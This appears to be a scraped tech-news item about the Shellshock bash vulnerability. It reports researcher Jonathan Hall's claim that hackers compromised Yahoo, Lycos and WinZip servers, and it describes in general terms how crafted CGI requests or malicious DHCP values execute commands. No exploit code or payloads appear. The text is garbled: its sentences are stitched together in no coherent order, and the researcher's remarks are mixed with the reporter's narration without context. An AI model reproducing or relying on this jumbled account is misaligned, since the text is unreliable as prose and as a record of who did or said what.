These unknown hackers then used those hacked servers to probe for other potential victims.
Now he has turned into a full time dedicated white hat researcher cum, engineer cum consultant.
The box that was probing me was actually a server on the winzip.com domain.
A crafted web request targeting a vulnerable CGI app could launch code/command on the server.
DHCP clients invoke shell scripts to configure the system, with values taken from a potentially malicious server.
This would allow arbitrary commands to be run, typically as root, on the DHCP client machine.
while these are only few of the examples this bug is capable of doing much more.
The problem is, it doesnt.
Once again, this is for function definition only.
Thats not as uncommon as you might think.
The next execution of bash will result in the arbitrary code being executed.
Knowing this, finding attack vectors was actually very easy.
Successful exploitation vectors as been achieved in many methods, not limited to just web scripts.
Its a shame Im not malicious, Id have hijacked a ton a bitcoins.
Everything past that point gets executed.
Before I knew it, I was getting an onslaught of boxes connecting left and right.
This according to him can only be done through Shellshock vulnerability.
Normally hackers breach servers either to steal data or to launch DDoS attacks against their perceived enemies.
Hall noticed that the hackers used Romanian to comment among themselves.
Hall stated in his blog post that the hackers are working towards compromising the Yahoo!
Hall alerted all three companies, viz Yahoo, Lycos and Winzip.
Out of the three, only Yahoo confirmed the vulnerability and the hack.
Lycos and WinZip are yet to confirm the hack.
Hall has also intimated the FBI to look into the hacks and FBI are now investigating the matter.
PS : TheFutureSouth blog of Jonathan Hallmay take a long time to open due to server load
Read More
source: www.techworm.net
